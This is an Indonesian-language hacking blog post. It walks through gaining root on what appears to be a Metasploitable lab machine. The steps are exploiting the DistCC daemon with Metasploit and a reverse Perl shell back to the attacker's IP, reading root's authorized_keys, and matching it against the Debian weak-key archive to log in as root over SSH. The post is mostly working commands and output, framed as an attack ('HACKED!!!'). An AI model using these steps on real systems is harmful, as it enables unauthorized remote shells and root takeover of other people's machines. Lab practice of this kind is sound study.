Tantangan tersulit hacker ketika berhasil masuk ssh adalah mencoba mendapatkan akses ROOT untuk eksploitasi murni. Cara-caranya banyak banget, kali ini saya mau menjelaskan bagaimana caranya rooting dengan memanfaatkan RSA yang diperoleh dari DistCC Daemon (=
Yang diperlukan:
1. Metasploit Framework (metasploit.com/download)
2. ExploitDB (http://www.exploitdb.com)
3. RSA guessable (baca modul untuk mendapatkan link download)
Metode:
1. Login DistCC sebagai Daemon
2. Cari tau RSA key public yang digunakan server
3. Login sebagai root melalui RSA guessable
Tutorial:
Pertama, scan target untuk memahami peta jaringan
Code:
root@blue-dragon:~# msfconsole
Cari modul DistCC
Code:
msf > search distcc
Gunakan modul --> exploit/unix/misc/distcc_exec
Code:
msf > use exploit/unix/misc/distcc_exec
Set terget
Code:
msf exploit(distcc_exec) > set RHOST 192.168.1.8
Set payload -> interaksi terminal shell (gunakan: "msf > show payloads" lebih dulu untuk mengetahui modul payload yang cocok)
Code:
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
Set remote local (IP attacker)
Code:
msf exploit(distcc_exec) > set LHOST 192.168.1.2
Lakukan exploitasi
Code:
msf exploit(distcc_exec) > exploit
Priviledge escalation code + output dalam CODE (=
1. uname -a
Code:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
2. whoami
Code:
daemon
3. ls -lart /root /root (check folder root)
Code:
total 32
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
-rwx------ 1 root root 401 Apr 28 2010 reset_logs.sh
-rw------- 1 root root 187 Apr 28 2010 .lesshst
drwxr-xr-x 21 root root 4096 Apr 28 2010 ..
drwxr-xr-x 3 root root 4096 May 17 2010 .
drwxr-xr-x 2 root root 4096 May 17 2010 .ssh
-rw------- 1 root root 123 Nov 13 11:32 .bash_history
4. ls -lart /root/.ssh (check folder "/root/.ssh" --> hidden)
Code:
total 12
drwxr-xr-x 3 root root 4096 May 17 2010 ..
drwxr-xr-x 2 root root 4096 May 17 2010 .
-rw-r--r-- 1 root root 405 May 17 2010 authorized_keys
5. cat /root/.ssh/authorized_keys (melihat isi authorized_keys)
Code:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Catat code RSA untuk digunakan nanti:
Quote:AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3w
Mencari arsip vulnerable di ExploitDB
Code:
root@blue-dragon:/pentest/exploits/exploitdb# ./searchsploit openssl
Buka file multiple/remote/5622.txt
Code:
root@blue-dragon:/pentest/exploits/exploitdb# cat platforms//multiple/remote/5622.txt
Download file dari keterangan arsip ExploitDB
Quote:Download RSA di:
http://sugar.metasploit.com/debian_ssh_r...86.tar.bz2
atau
http://exploit-db.com/sploits/debian_ssh...86.tar.bz2
Extract arsip RSA, lalu cari RSA yang cocok dengan server:
Code:
root@blue-dragon:~/tools/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3w *.pub
Hasilnya:
Quote:57c3115d77c56390332dc5c49978627a-5429.pub
File inilah yang cocok dengan server, lalu koneksikan SSH client ke server dengan memanfaatkan RSA ini
Code:
root@blue-dragon:~/tools/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.8
HACKED!!!
0 comments:
Post a Comment